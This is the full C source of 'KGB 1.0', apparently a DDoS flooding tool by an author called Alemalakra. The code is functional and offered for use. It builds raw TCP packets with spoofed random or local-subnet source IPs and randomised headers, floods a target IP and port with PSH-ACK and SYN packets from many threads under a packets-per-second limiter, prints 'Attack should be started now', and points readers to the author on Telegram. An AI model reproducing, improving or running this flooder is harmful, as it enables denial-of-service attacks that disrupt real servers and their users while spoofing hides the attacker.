1
/*
2
    KGB 1.0
3

4
    Method made by Alemalakra @2018.
5

6
    Fuck laziness!!
7
*/
8

9
#include<stdio.h>
10
#include<string.h>
11
#include<sys/socket.h>
12
#include<stdlib.h>
13
#include<errno.h>
14
#include<netinet/tcp.h>
15
#include<netinet/ip.h>
16
#include<arpa/inet.h>
17
#include<pthread.h>
18
#include<stdint.h>
19
#include<unistd.h>
20
#include<sys/types.h>
21
#include<stdbool.h>
22
#include<time.h>
23

24
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
25
char ipv4src[17];
26
char * payload_data;
27
int Checksum;
28
int Source_Local = 0;
29
int Combination = 0;
30
static unsigned int floodport;
31
volatile unsigned int game = 1;
32
volatile int limiter;
33
volatile unsigned int packets_per_second;
34
volatile unsigned int sleeptime = 100;
35
 
36
/* 
37
    96 bit (12 bytes) pseudo header needed for tcp header checksum calculation.
38
*/
39
struct pseudo_header
40
{
41
	u_int32_t source_address;
42
	u_int32_t dest_address;
43
	u_int8_t placeholder;
44
	u_int8_t protocol;
45
	u_int16_t tcp_length;
46
};
47

48
/* 
49
    Local-IPv4 Function Splitter.
50
*/
51
char *local_ipv4_target(char *baseip) {
52
    struct in_addr ipaddress, subnetmask;
53
    inet_pton(AF_INET, baseip, &ipaddress);
54
    inet_pton(AF_INET, "255.255.255.0", &subnetmask);
55
    unsigned long first_ip = ntohl(ipaddress.s_addr & subnetmask.s_addr);
56
    unsigned long last_ip = ntohl(ipaddress.s_addr | ~(subnetmask.s_addr));
57
    unsigned long ipfinal = htonl((rand() % (last_ip - first_ip + 1)) + first_ip);
58
    char *result = malloc(INET_ADDRSTRLEN);
59
    inet_ntop(AF_INET, &ipfinal, result, INET_ADDRSTRLEN);
60
    return result;
61
}
62
 
63
/*
64
    Generic checksum calculation function, (Unliky all public scripts, This sending valid packets serial, Of course with Opt in Argument.)
65
*/
66
unsigned short csum(unsigned short *ptr,int nbytes) 
67
{
68
	register long sum;
69
	unsigned short oddbyte;
70
	register short answer;
71

72
	sum=0;
73
	while(nbytes>1) {
74
		sum+=*ptr++;
75
		nbytes-=2;
76
	}
77
	if(nbytes==1) {
78
		oddbyte=0;
79
		*((u_char*)&oddbyte)=*(u_char*)ptr;
80
		sum+=oddbyte;
81
	}
82

83
	sum = (sum>>16)+(sum & 0xffff);
84
	sum = sum + (sum>>16);
85
	answer=(short)~sum;
86
	
87
	return(answer);
88
}
89

90
/*
91
    String/Number replace for %r% and %n% new function on Kgb 1.0.
92
*/
93

94
char *replace_kgb(char *str, char *toReplace, int onlyNumbers) {
95
    char *result;
96
    int toReplaceLen = strlen(toReplace);
97
    int i, cnt = 0;
98
    for (i = 0; str[i] != '\0'; i++) {
99
        if (strstr(&str[i], toReplace) == &str[i]) {
100
            cnt++;
101
            i += toReplaceLen - 1;
102
        }
103
    }
104
    result = (char *)malloc(i + cnt * (1 - toReplaceLen) + 1); // 1 caracter aleatorio - toReplaceLen
105
    char randchar[2];
106
    randchar[1] = '\0';
107
    i = 0;
108
    while (*str) {
109
        if (strstr(str, toReplace) == str) {
110
            randchar[0] = (char)onlyNumbers ? (rand() % (48 - 57 + 1)) + 48 : (rand() % (122 - 97 + 1)) + 97;
111
            strcpy(&result[i], randchar);
112
            i += 1; // 1 caracter aleatorio
113
            str += toReplaceLen;
114
        } else {
115
            result[i++] = *str++;
116
        }
117
    }
118
    result[i] = '\0';
119
    return result;
120
}
121

122
/*
123
    IPv4 Generation Function (Made by me, took me some time, But yh).
124
*/
125
char * ipv4_generator(char *par1, char * targettr, int Source_Local) {
126
	//return "37.148.208.161";
127
    if (Source_Local == 1) { // Yes Source Local Spoof.
128
        return local_ipv4_target(par1);
129
    } else { // Random IPv4
130
        snprintf(ipv4src, sizeof(ipv4src)-1, "%d.%d.%d.%d", rand()%254, rand()%254, rand()%254, rand()%254);
131
    }
132
    return ipv4src;
133
}
134

135
/*
136
    KGB flood thread. (Each thread)
137
*/
138
void *kgb_thread(void *par1) {
139
    // Target.
140
    char *targettr = (char *)par1;
141
    //Create a raw socket of type IPPROTO. (IPv4 Of course...)
142
    int s = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
143
    if(s == -1) {
144
        //socket creation failed, may be because of non-root privileges.
145
        perror("Failed to create raw socket, Get root eh?");
146
        exit(1);
147
    }
148
    //Datagram to represent the packet
149
    char datagram[4096] , source_ip[32] , *data , *pseudogram;
150
    //zero out the packet buffer
151
    memset (datagram, 0, 4096);
152
    //IP header
153
    struct iphdr *iph = (struct iphdr *) datagram;
154

155
    //TCP header
156
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
157
    struct sockaddr_in sin;
158
    struct pseudo_header psh;
159
    //Data part
160
    data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
161
    strcpy(data , "");
162

163
    // Source IPv4.
164
    strcpy(source_ip , "1.2.3.4"); // Initial address, changed later.
165
    sin.sin_family = AF_INET;
166
    sin.sin_port = htons(floodport);
167
    sin.sin_addr.s_addr = inet_addr (targettr);
168
    //Fill in the IP Header
169
    iph->ihl = 5;
170
    iph->version = 4;
171
    iph->tos = 0;
172
    iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
173
    iph->id = htonl (rand()); //Id of this packet
174
    iph->frag_off = 0;
175
    iph->ttl = rand()%255;
176
    iph->protocol = IPPROTO_TCP;
177
    iph->check = 0;      //Set to 0 before calculating checksum
178
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
179
    iph->daddr = sin.sin_addr.s_addr;
180
    // IPv4 Checksum-
181
    iph->check = csum ((unsigned short *) datagram, iph->tot_len);
182
    //TCP Header
183
    tcph->source = htons(rand());
184
    tcph->dest = htons (floodport);
185
    tcph->seq = rand();
186
    tcph->ack_seq = 0;
187
    tcph->doff = 5; //tcp header size
188
    tcph->fin=0;
189
    tcph->syn=0;
190
    tcph->rst=0;
191
    tcph->psh=1;
192
    tcph->ack=1;
193
    tcph->urg=0;
194
    tcph->window = htons (rand());  /* maximum allowed window size */
195
    tcph->check = 0;    //leave checksum 0 now, filled later by pseudo header
196
    tcph->urg_ptr = 0;
197

198
    psh.source_address = inet_addr( source_ip );
199
    psh.dest_address = sin.sin_addr.s_addr;
200
    psh.placeholder = 0;
201
    psh.protocol = IPPROTO_TCP;
202
    psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
203

204

205
    
206
    int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
207
    pseudogram = malloc(psize);
208
    memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
209
    memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
210
    tcph->check = csum( (unsigned short*) pseudogram , psize);
211
    //IP_HDRINCL to tell the kernel that headers are included in the packet
212
    int one = 1;
213
    const int *val = &one;
214
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
215
    {
216
        perror("Error setting IP_HDRINCL");
217
        //exit(0);
218
    }
219
    srand(time(NULL));
220
    int i;
221
    while (1)
222
    {
223
        //Send the packet
224
        sendto (s, datagram, iph->tot_len ,  0, (struct sockaddr *) &sin, sizeof (sin));
225
        iph->ttl = rand()%255;
226
        iph->id = htonl (rand());
227
        // EMPEZAR TEST AQUI CTRL ZETA
228
        if (Combination == 1) {
229
            // PSH-ACK and SYN Packets.
230
            if (rand() % 2 == 1) {
231
                tcph->ack = 0;
232
                tcph->psh = 0;
233
                tcph->syn = 1;
234
            } else {
235
                tcph->ack = 1;
236
                tcph->psh = 1;
237
                tcph->syn = 0; 
238
            }
239
        }
240

241
            
242
        tcph->source = htons (rand());
243
        tcph->seq = htons(rand());
244
        tcph->window = htons (rand());
245

246
        //tcph->tcp_length = htons(strlen(data));
247
        tcph->check = 0;
248
        strcpy(source_ip , ipv4_generator((char *) par1, targettr, Source_Local));
249
        iph->saddr = inet_addr ( source_ip );
250
        psh.source_address = inet_addr( source_ip );
251
        psh.dest_address = sin.sin_addr.s_addr;
252
        psh.placeholder = 0;
253
        psh.protocol = IPPROTO_TCP;
254
        psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
255
        
256
        if(strstr(payload_data, "%r%") != NULL || strstr(payload_data, "%n%") != NULL) {
257
            data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
258
            strcpy(data , replace_kgb(payload_data, "%r%", 0));
259
            strcpy(data , replace_kgb(data, "%n%", 1));
260
            iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
261
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
262
            //tcph->len = htons(strlen(data));
263

264
            if (Checksum == 0) {
265
                tcph->check = 0;
266
            } else {
267
                psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
268

269
                psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
270
                pseudogram = malloc(psize);
271
                memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
272
                memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
273
                
274
                tcph->check = csum( (unsigned short*) pseudogram , psize);
275
            }
276
        } else {
277
            if (Checksum == 0) {
278
                tcph->check = 0;    
279
            } else {
280
                psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
281
                pseudogram = malloc(psize);
282
                memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
283
                memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
284
                tcph->check = csum( (unsigned short*) pseudogram , psize);
285
            }
286
        }
287
        packets_per_second++;
288
        if(i >= limiter) {
289
            i = 0;
290
            usleep(sleeptime);
291
        }
292
        i++;
293

294
    }
295
}
296

297
/*
298
    Main function. (Threads, Arguments, PPS Limiter, Custom Payload, Etc, Etc..)
299
*/
300
int main(int argc, char *argv[ ]){
301
    if(argc < 9){
302
            fprintf(stdout, "[!] KGB v1.0 by Alemalakra.\n");
303
            fprintf(stdout, "[!] Usage: %s <IP> <PORT> <THREADS> <PPS> <TIME> <CHECKSUM> <SOURCE_LOCAL> <COMBINATION>\n", argv[0]);
304
            fprintf(stdout, "[!] Get details contacting me on Telegram.\n");
305
            exit(-1);
306
    }
307
    int i = 0;
308
    //game = atoi(argv[3]);
309
    int num_threads = atoi(argv[3]);
310
    int maxpps = atoi(argv[4]);
311
    payload_data = ".";
312
    floodport = atoi(argv[2]);
313
    Checksum = atoi(argv[6]);
314
    Source_Local = atoi(argv[7]);
315
    Combination = atoi(argv[8]);
316
    limiter = 0;    
317
    packets_per_second = 0;
318
    int multiplier = 20;
319
    pthread_t thread[num_threads];
320
    struct thread_data td[num_threads];
321

322
    for(i = 0;i<num_threads;i++){
323
        pthread_create( &thread[i], NULL, &kgb_thread, (void *) argv[1]);
324
        //
325
    }
326
    //pthread_create( &thread[i], NULL, &syn_pkt, (void *) argv[1]);
327
    fprintf(stdout, "[!] Russian Army preparing Guns.... DONE!\n");
328
    fprintf(stdout, "[!] Attack should be started now.\n");
329

330
    for(i = 0;i<(atoi(argv[5])*multiplier);i++) {
331
        usleep((1000/multiplier)*1000);
332
        if((packets_per_second*multiplier) > maxpps) {
333
            if(1 > limiter) {
334
                sleeptime+=100;
335
            } else {
336
                limiter--;
337
            }
338
        } else {
339
            limiter++;
340
            if(sleeptime > 25) {
341
                sleeptime-=25;
342
            } else {
343
                sleeptime = 0;
344
            }
345
        }
346
        packets_per_second = 0;
347
    }
348

349
    return 0;
350
}
351

352